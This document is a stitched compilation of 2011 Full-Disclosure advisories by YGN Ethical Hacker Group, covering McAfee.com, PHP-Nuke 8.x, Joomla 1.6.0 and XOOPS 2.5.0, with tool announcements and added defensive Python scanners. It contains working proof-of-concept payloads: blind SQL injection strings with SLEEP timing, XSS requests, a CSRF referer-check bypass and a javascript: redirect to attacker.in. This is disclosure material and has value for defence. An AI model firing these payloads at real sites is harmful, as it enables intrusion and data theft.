4. Look for common vulnerable points and misuses,
e.g., for JS files, examine calls like document.URLUnencoded,
document.referrer, document.location, window.location,
location.href, document.URL ...etc.


Passive scan is just a small subset of the assessment realm. Findings are
very limited.

Our recent disclosure of the Plesk open redirect flaw was the result of a
purely passive scan of a static HTML web site -
http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection
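Steps 3 and 4 of the recipe above, as an added example that is not code from YGN, from host-extract or from any other tool named in the thread: a scanner for one fetched JavaScript file that lists DOM XSS sources and sinks by line number and, like the host-extract run in the McAfee advisory in this thread, pulls hostnames and IP addresses out of string literals and flags those that look internal. The sample script is constructed for the example, and the list of "internal" name labels is a heuristic, not a standard.

```python
import ipaddress
import re

# Added example; not host-extract, ratproxy or any other tool named in the
# thread. Implements steps 3 and 4 of the passive-scan recipe for one
# JavaScript file: list DOM XSS sources and sinks by line, and pull every
# hostname / IP literal out of the strings, flagging ones that look internal.

DOM_SOURCES = (
    "document.URLUnencoded", "document.URL", "document.referrer",
    "document.location", "window.location", "location.href",
    "location.search", "location.hash", "window.name",
)
DOM_SINKS = (
    "innerHTML", "outerHTML", "document.write", "eval(", "setTimeout(",
    "setInterval(", "location.replace(", "location.assign(",
)
# Heuristic (assumption): labels that do not occur in public DNS names.
INTERNAL_LABELS = {"local", "localdomain", "corp", "internal", "intranet", "lan"}

# Longest names first so "document.URL" cannot shadow "document.URLUnencoded".
_SOURCE_RE = re.compile(
    "(?:" + "|".join(re.escape(s) for s in sorted(DOM_SOURCES, key=len, reverse=True)) + r")\b")
_SINK_RE = re.compile(
    "|".join(re.escape(s) for s in sorted(DOM_SINKS, key=len, reverse=True)))
_STRING_RE = re.compile(r'"([^"\\]*)"|\'([^\'\\]*)\'')
_HOST_RE = re.compile(
    r"\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}"  # dotted name
    r"|(?:\d{1,3}\.){3}\d{1,3})\b", re.I)                      # IPv4 literal


def _grep(regex, text):
    """(line number, matched text) for every hit, in file order."""
    return [(n, m.group(0)) for n, line in enumerate(text.splitlines(), 1)
            for m in regex.finditer(line)]


def looks_internal(host):
    """Private/loopback/link-local IPs, or a name carrying a non-public label."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return any(label in INTERNAL_LABELS for label in host.split("."))


def extract_hosts(text):
    """Hostnames and IPs found inside string literals, with an internal flag.
    Restricting to literals avoids matching property chains like a.b.c."""
    found = set()
    for m in _STRING_RE.finditer(text):
        literal = m.group(1) if m.group(1) is not None else m.group(2)
        for host in _HOST_RE.findall(literal):
            found.add(host.lower())
    return [(h, looks_internal(h)) for h in sorted(found)]


def passive_scan(js_text):
    return {
        "sources": _grep(_SOURCE_RE, js_text),
        "sinks": _grep(_SINK_RE, js_text),
        "hosts": extract_hosts(js_text),
    }


# Constructed sample modelled on an analytics profile script; not real data.
SAMPLE_JS = """\
var s_account = "exampleprod";
s.trackingServer = "metrics.example.com";
s.trackingServerSecure = "smetrics.example.com";
var debugHost = "http://omniture-stage.corp.example.local/";
var collector = "http://10.1.2.3:8080/collect";
var q = document.URL.split("?")[1];
document.getElementById("out").innerHTML = q;
if (document.referrer.indexOf("example.com") < 0) { window.location.href = "http://" + q; }
"""

if __name__ == "__main__":
    for key, rows in passive_scan(SAMPLE_JS).items():
        print(key, rows)
```

A source and a sink on nearby lines (document.URL on line 6 feeding innerHTML on line 7 in the sample) is the pattern worth tracing by hand; the hostname list is what a passive reviewer would compare against the target's public DNS to spot staging or intranet names that were never meant to ship.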



[Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread YGN Ethical Hacker Group
Vulnerabilities in *McAfee.com


1. VULNERABILITY DESCRIPTION

- Cross Site Scripting
   
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

- Information Disclosure > Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js

($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)

- Information Disclosure > Source Code Disclosure:


view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp 
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp

view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp

view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp

view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


2. RECOMMENDATION

- Fully utilize McAfee Foundstone experts
- Use outbound monitoring of traffic to detect potential information leakage


3. VENDOR

McAfee Inc
http://www.mcafee.com


4. DISCLOSURE TIME-LINE

2011-02-10: reported to vendor
2011-02-12: vendor replied "we are working to resolve the issue as
quickly as possible"
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessons Learned:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

#yehg [2011-03-27]



[Full-disclosure] Tool Update Announcement WhatWeb v0.4.6 Released. Now with over 900 plugins!

2011-03-26 Thread YGN Ethical Hacker Group
Version 0.4.6 of WhatWeb is now released. Enjoy scanning the web.





Readme for WhatWeb - Next generation web scanner.
By urbanadventurer aka Andrew Horton from Security-Assessment.com
Version: 0.4.6. March 25th, 2011
License: GPLv2



This product is subject to the terms detailed in the license agreement.
For more information about WhatWeb visit:

       Homepage:       http://www.morningstarsecurity.com/research/whatweb
       Wiki:           https://github.com/urbanadventurer/WhatWeb/wiki/

If you have any questions, comments or concerns regarding WhatWeb, please
consult the documentation prior to contacting one of the developers. Your
feedback is always welcome.


       Contents
       
       1.  About WhatWeb
       2.  Example Usage
       3.  Usage
       4.  Logging & Output
       5.  Plugins
       6.  Aggression
       7.  Recursive Spidering
       8.  Performance & Stability
       9.  Optional Dependencies
       10. Release History
       11. Credits
       12. Updates & Additional Information
       



1. About WhatWeb


WhatWeb identifies websites. Its goal is to answer the question, "What
is that Website?". WhatWeb recognises web technologies including
content management systems (CMS), blogging platforms,
statistic/analytics packages, JavaScript libraries, web servers, and
embedded devices. WhatWeb has over 900 plugins, each to recognise
something different. WhatWeb also identifies version numbers, email
addresses, account IDs, web framework modules, SQL errors, and more.

WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb
supports an aggression level to control the trade off between speed
and reliability. When you visit a website in your browser, the
transaction includes many hints of what web technologies are powering
that website. Sometimes a single webpage visit contains enough
information to identify a website, but when it does not, WhatWeb can
interrogate the website further. The default level of aggression,
called 'passive', is the fastest and requires only one HTTP request of
a website. This is suitable for scanning public websites. More
aggressive modes were developed for use in penetration tests.

Most WhatWeb plugins are thorough and recognise a range of cues from
subtle to obvious. For example, most WordPress websites can be
identified by the meta HTML tag, e.g.
'<meta name="generator" content="WordPress 2.6.5">', but a minority of
WordPress websites remove this identifying tag. This does not thwart
WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include
checking the favicon, default installation files, login pages, and
checking for /wp-content/ within relative links.


Features:
       * Over 900 plugins
       * Control the trade off between speed/stealth and reliability
       * Plugins include example URLs
       * Performance tuning. Control how many websites to scan concurrently.
       * Multiple log formats: Brief (greppable), Verbose (human readable),
         XML, JSON, MagicTree, RubyObject, MongoDB.
       * Recursive web spidering
       * Proxy support including TOR
       * Custom HTTP headers
       * Basic HTTP authentication
       * Control over webpage redirection
       * Nmap-style IP ranges
       * Fuzzy matching
       * Result certainty awareness
       * Custom plugins defined on the command line



2. Example Usage


Using WhatWeb on a handful of websites (standard WhatWeb output is in colour):

$ ./whatweb slashdot.org reddit.com
http://reddit.com [302] HTTPServer[AkamaiGHost],
RedirectLocation[http://www.reddit.com/],
Via-Proxy[1.1 bc1], IP[173.223.232.64], Akamai-Global-Host,
Country[UNITED STATES][US]
http://slashdot.org [200] Script, HTTPServer[Unix][Apache/1.3.42
(Unix) mod_perl/1.31],
Google-Analytics[GA][32013], Via-Proxy[1.1 bc5],
UncommonHeaders[x-fry,x-varnish,x-xrds-location,slash_log_data],
Apache[1.3.42][mod_perl/1.31],
HTML5, IP[216.34.181.45], 
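The readme above describes the passive WordPress cues (the generator meta tag, /wp-content/ and similar paths in relative links) and WhatWeb's notion of result certainty. The following Python fingerprinter is an added example written for this page, not WhatWeb's own plugin code; the three HTML pages it inspects are constructed samples, and the certainty labels are this example's own.

```python
import re

# Constructed sample pages (not real sites) used to exercise the cues below.
PAGE_WITH_META = """<html><head>
<meta name="generator" content="WordPress 2.6.5">
<link rel="stylesheet" href="/wp-content/themes/twentyten/style.css">
</head><body></body></html>"""

PAGE_STRIPPED_META = """<html><head>
<link rel="stylesheet" href="/wp-content/themes/custom/style.css">
<script src="/wp-includes/js/jquery/jquery.js"></script>
</head><body><a href="/wp-login.php">Log in</a></body></html>"""

PAGE_OTHER_CMS = """<html><head>
<meta name="generator" content="Joomla! 1.6">
</head><body></body></html>"""

# Obvious cue: the generator meta tag, optionally carrying a version number.
META_GENERATOR = re.compile(
    r'<meta\s+name=["\']?generator["\']?\s+content=["\']?WordPress(?:\s+([\d.]+))?',
    re.I)
# Subtle cues: WordPress-specific paths inside href/src attributes.
WP_PATHS = re.compile(
    r'(?:href|src)=["\']?[^"\'>\s]*/(wp-content|wp-includes|wp-login\.php)',
    re.I)


def fingerprint_wordpress(html):
    """Return which cues matched, the version (if disclosed) and a certainty."""
    cues = []
    version = None
    m = META_GENERATOR.search(html)
    if m:
        cues.append("meta-generator")
        version = m.group(1)
    paths = sorted({p.lower() for p in WP_PATHS.findall(html)})
    cues.extend(paths)
    if m:
        certainty = "certain"        # the site announces itself
    elif len(paths) >= 2:
        certainty = "probable"       # several independent path cues
    elif paths:
        certainty = "possible"       # a single cue can be a coincidence
    else:
        certainty = None
    return {"wordpress": bool(cues), "version": version,
            "cues": cues, "certainty": certainty}


if __name__ == "__main__":
    for name, page in (("meta", PAGE_WITH_META),
                       ("stripped", PAGE_STRIPPED_META),
                       ("other", PAGE_OTHER_CMS)):
        print(name, fingerprint_wordpress(page))
```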

[Full-disclosure] [Tool Update Announcement] inspathx

2011-03-23 Thread YGN Ethical Hacker Group
Tool Home:
http://code.google.com/p/inspathx/


CHANGELOG
=========


Stat: path definitions - 342, path vuln definitions - 140


== Added --xp as alias --x-p

== Refined param array that supports any number of dimensions with the -p
option (i.e., -p 1, -p 2, -p 3) - Thanks to Brendan Coles

http://code.google.com/p/inspathx/wiki/OPTION_Param_Array

== Added dotnet 1.x ASPX Full Path Disclosure (tilde character
/~.aspx) - Thanks to Ryan Dewhurst

http://code.google.com/p/inspathx/wiki/ASPNET_FULL_PATH_DISCLOSURE_DOTNET1X





-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] PHP-Nuke 8.x <= chng_uid Blind SQL Injection Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x <= Blind SQL Injection Vulnerability



1. OVERVIEW

The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection.


2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The chng_uid parameter is not properly sanitized upon submission to
/admin.php, which leads to a Blind SQL Injection vulnerability.
This allows an attacker to inject or manipulate SQL queries in the
back-end database, allowing for the manipulation or disclosure of
arbitrary data.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

=> /admin.php

POST /admin.php HTTP/1.1
Referer: http://localhost/admin.php?op=mod_users
Content-Type: application/x-www-form-urlencoded
Host: localhost

chng_uid=[BLIND_SQL_INJECTION]+&op=modifyUser


Tested Payloads:
' or 1=1-- [TRUE]
' or 1=2-- [FALSE]
' or substring(@@version,1,1)=5--  [TRUE if mySQL version is 5.x]
' or substring(@@version,1,1)=4--  [FALSE if mySQL version is 5.x]
' or SLEEP(15)=0-- [sleep for 15 seconds]

Successful response (True) returns the user update form page.


6. SOLUTION

Lock down access to php-Nuke administration backend.
No patch is available yet.
Use of this product is NOT recommended because of the long lack of
updates and the vendor's negligence about security reports.


7. VENDOR

php-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloads&d_op=getit&lid=658
CWE-89: http://cwe.mitre.org/data/definitions/89.html



#yehg [2010-03-23]

keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql injection

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] PHP-Nuke 8.x <= Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x <= Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass
Vulnerability



1. OVERVIEW

PHP-Nuke version 8.x and lower versions are vulnerable to Cross Site
Request Forgery (CSRF) because its Anti-CSRF mechanism (Referer check)
is found to be broken.


2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

PHP-Nuke version 8.x and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions in the majority of
administrator functions, such as adding a new user or assigning
administrative privileges to a user. By using a crafted URL, an
attacker may trick the victim into visiting his web page to take
advantage of the trust relationship between the authenticated victim
and the application. Such an attack could trick the victim into
executing arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

Consider the following code snippet in /mainfile.php of PHP-Nuke:

//

if (!function_exists('stripos')) {
    function stripos_clone($haystack, $needle, $offset=0) {
        $return = strpos(strtoupper($haystack), strtoupper($needle), $offset);
        if ($return === false) {
            return false;
        } else {
            return true;
        }
    }
} else {
    // But when this is PHP5, we use the original function
    function stripos_clone($haystack, $needle, $offset=0) {
        $return = stripos($haystack, $needle, $offset=0);
        if ($return === false) {
            return false;
        } else {
            return true;
        }
    }
}

...

// Posting from other servers is not allowed
// Fix by Quake
// Bug found by PeNdEjO

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_SERVER['HTTP_REFERER'])) {
        // stripos_clone() only reports whether HTTP_HOST occurs somewhere
        // inside the Referer string; it never compares the Referer's host
        if (!stripos_clone($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST'])) {
            die('Posting from another server not allowed!');
        }
    } else {
        die($posttags);
    }
}
//

It is clear that stripos_clone checks whether the HTTP_REFERER value
matches the target domain or not.
An attacker can easily bypass it by creating the victim domain name under
his web root folder, like:

http://attacker.in/victim.com/

From there, he could effectively perform CSRF attacks against php-Nuke users.

A short P0C demo video can be seen at
http://yehg.net/lab/pr0js/training/view/misc/PHPNuke_8x_Anti-CSRF-Bypass/


6. SOLUTION

Not Available.
Use of this product is NOT recommended because of the long lack of
updates and the vendor's negligence about security reports.


7. VENDOR

PHP-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_request_forgery
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke
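To make the flaw in the mainfile.php check concrete, here is an added Python illustration (not PHP-Nuke code and not a vendor patch): the first function mirrors the substring logic of stripos_clone, the second parses the Referer and compares its host component, which is the check that rejects the http://attacker.in/victim.com/ Referer shown above. The host names are the placeholders from the advisory; the port handling is this example's own assumption.

```python
from urllib.parse import urlsplit


def referer_ok_substring(referer, host):
    """Mirror of the mainfile.php logic: a case-insensitive substring search.
    Any Referer that merely *contains* the expected host string passes."""
    if referer is None:
        return False                       # the PHP code die()s without a Referer
    return host.lower() in referer.lower()


def referer_ok_host(referer, host):
    """Hardened variant: parse the Referer as a URL and compare its host
    component exactly. Scheme must be http(s); the port is compared only
    when the expected host carries one (e.g. "victim.com:8443")."""
    if not referer:
        return False                       # keep the original behaviour: no Referer, no POST
    try:
        parts = urlsplit(referer)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        expected_host, _, expected_port = host.lower().partition(":")
        if parts.hostname.lower() != expected_host:
            return False
        if expected_port and str(parts.port) != expected_port:
            return False
    except ValueError:                     # malformed URL or port
        return False
    # A Referer check is at best a secondary control; a per-session anti-CSRF
    # token on each state-changing form remains the standard mitigation.
    return True


if __name__ == "__main__":
    bypass = "http://attacker.in/victim.com/"      # Referer from the advisory
    print("substring check:", referer_ok_substring(bypass, "victim.com"))   # True
    print("host check:     ", referer_ok_host(bypass, "victim.com"))        # False
```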

[Full-disclosure] PHP-Nuke 8.x <= Cross Site Scripting Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x <= Cross Site Scripting Vulnerability



1. OVERVIEW

PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scripting.


2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The sender_name and sender_email parameters are not properly
sanitized upon submission to /modules.php?name=Feedback, which
allows an attacker to conduct a Cross Site Scripting attack. This may
allow an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

Parameter: sender_name

[REQUEST]
POST /phpnuke/modules.php?name=Feedback HTTP/1.1
Host: attacker.in
Referer: http://attacker.in/phpnuke/modules.php?name=Feedback

sender_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3E&sender_email=&message=&opi=ds&submit=Send
[/REQUEST]

-
Parameter: sender_email

[REQUEST]
POST /phpnuke/modules.php?name=Feedback HTTP/1.1
Host: attacker.in
Referer: http://attacker.in/phpnuke/modules.php?name=Feedback

sender_email=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3E&sender_name=&message=&opi=ds&submit=Send
[/REQUEST]


6. SOLUTION

Not Available.
Use of this product is NOT recommended because of the long lack of
updates and the vendor's negligence about security reports.


7. VENDOR

PHP-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_scripting
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
php-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloads&d_op=getit&lid=658
CWE-79: http://cwe.mitre.org/data/definitions/79.html



#yehg [2010-03-23]

keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1,  xss

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability

2011-03-22 Thread YGN Ethical Hacker Group
Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability


1. OVERVIEW

Joomla! 1.6.0 is vulnerable to Full Path Disclosure.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Direct access to a library file was not protected, which reveals the
full internal path on a server whose PHP setting is configured to show
errors.


4. VERSION AFFECTED

Joomla! 1.6.0


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla160/libraries/phpmailer/language/phpmailer.lang-joomla.php


6. SOLUTION

Upgrade to Joomla! 1.6.1 or higher


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-24: notified vendor
2011-03-08: vendor released fix
2011-03-23: vulnerability disclosed


10. REFERENCES

Vendor Advisory URL:
http://developer.joomla.org/security/news/328-20110201-core-sql-injection-path-disclosure.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_full_path_disclosure
inspathx signature:
http://code.google.com/p/inspathx/source/browse/trunk/paths_vuln/joomla-1.6.0
WASC-13: http://projects.webappsec.org/w/page/13246936/Information-Leakage
CWE-200: http://cwe.mitre.org/data/definitions/200.html


#yehg [2011-03-23]

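The advisory above (and the inspathx signature it references) rests on PHP error output leaking an absolute server path when a library file is requested directly. The following Python is an added example, not inspathx code: it extracts the disclosed path and line from a PHP notice and derives the document root by lining the disclosed path up against the requested URL path, so a defender can confirm what a display_errors=On misconfiguration actually reveals. The response bodies are constructed samples; the /var/www/html and C:\xampp locations are assumptions.

```python
import re

# Constructed response bodies (not real server output). The first mimics the
# Joomla! 1.6.0 case: a notice raised by the directly requested language file.
RESPONSE_FPD = """<br />
<b>Notice</b>:  Undefined variable: PHPMAILER_LANG in <b>/var/www/html/joomla160/libraries/phpmailer/language/phpmailer.lang-joomla.php</b> on line <b>19</b><br />
"""
RESPONSE_WIN = """<br />
<b>Warning</b>:  include(foo.php): failed to open stream in <b>C:\\xampp\\htdocs\\site\\index.php</b> on line <b>3</b><br />
"""
RESPONSE_CLEAN = "<html><body>OK</body></html>"   # display_errors off: nothing leaks

# PHP's default html_errors format ("<b>Level</b>: msg in <b>path</b> on line <b>N</b>");
# the <b> tags are optional so the plain-text (html_errors=Off) form also matches.
PHP_ERROR_RE = re.compile(
    r"(?:<b>)?(Notice|Warning|Fatal error|Parse error|Deprecated)(?:</b>)?:\s*"
    r"(.+?)\s+in\s+(?:<b>)?(.+?)(?:</b>)?\s+on\s+line\s+(?:<b>)?(\d+)",
    re.S)


def disclosed_paths(body):
    """Return every absolute path a PHP error message in the body reveals."""
    return [{"level": level, "message": msg.strip(), "path": path, "line": int(line)}
            for level, msg, path, line in PHP_ERROR_RE.findall(body)]


def infer_docroot(request_path, disclosed_path):
    """Strip the requested URL path off the end of the disclosed file system
    path; what remains is the web server's document root (None if the two
    do not line up, e.g. when the error came from an included file)."""
    norm = disclosed_path.replace("\\", "/")      # tolerate Windows separators
    req = request_path.lstrip("/")
    if norm.endswith("/" + req):
        return norm[:-len(req)].rstrip("/") or "/"
    return None


if __name__ == "__main__":
    req = "/joomla160/libraries/phpmailer/language/phpmailer.lang-joomla.php"
    for hit in disclosed_paths(RESPONSE_FPD):
        print(hit["level"], hit["path"], "line", hit["line"])
        print("document root:", infer_docroot(req, hit["path"]))
```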

[Full-disclosure] XOOPS 2.5.0 <= Cross Site Scripting Vulnerability

2011-03-18 Thread YGN Ethical Hacker Group
XOOPS 2.5.0 <= Cross Site Scripting Vulnerability



1. OVERVIEW

The XOOPS 2.5.0 and lower versions were vulnerable to Cross Site Scripting.


2. BACKGROUND

XOOPS is an acronym of eXtensible Object Oriented Portal System. It's
the #1 Content Management System (CMS) project on www.sourceforge.net
and a recipient of several awards, and constantly places as finalist
in various CMS and Open Source competitions. It incorporates many
modules such as forums, photo galleries, calendars, article management
etc.


3. VULNERABILITY DESCRIPTION

Several parameters such as module/module[], memberslist_id[],
newname[], oldname[] were not properly sanitized upon submission to
the /modules/system/admin.php URL, which allows an attacker to conduct
a Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

XOOPS 2.5.0 and lower


5. PROOF-OF-CONCEPT/EXPLOIT


Parameter: module

http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe


Parameter: module[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1<script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]


Parameter: memberslist_id[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=usersselgroups=2
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

memberslist_id%5b%5d=<script>alert(1)</script>&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group
[/REQUEST]


Parameter: newname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System<script>alert(1)</script>
[/REQUEST]


Parameter: oldname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System<script>alert(1)</script>1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]


6. SOLUTION

